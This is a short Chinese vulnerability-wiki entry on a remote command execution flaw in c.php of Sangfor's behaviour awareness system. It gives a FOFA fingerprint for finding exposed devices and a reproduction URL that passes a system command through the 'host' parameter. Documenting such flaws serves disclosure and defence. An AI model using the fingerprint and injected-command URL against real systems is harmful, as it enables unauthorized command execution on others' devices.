深信服 行为感知系统 c.php 远程命令执行漏洞

漏洞描述

深信服 行为感知系统 c.php 远程命令执行漏洞,使用与EDR相同模板和部分文件导致命令执行

漏洞影响

Note

深信服 行为感知系统

FOFA

body="isHighPerformance : !!SFIsHighPerformance,"

漏洞复现

登录页面如下

访问漏洞Url

/tool/log/c.php?strip_slashes=system&host=ipconfig
Previous深信服 日志中心 c.php 远程命令执行漏洞Next深信服后台任意用户登陆漏洞

Last updated

Was this helpful?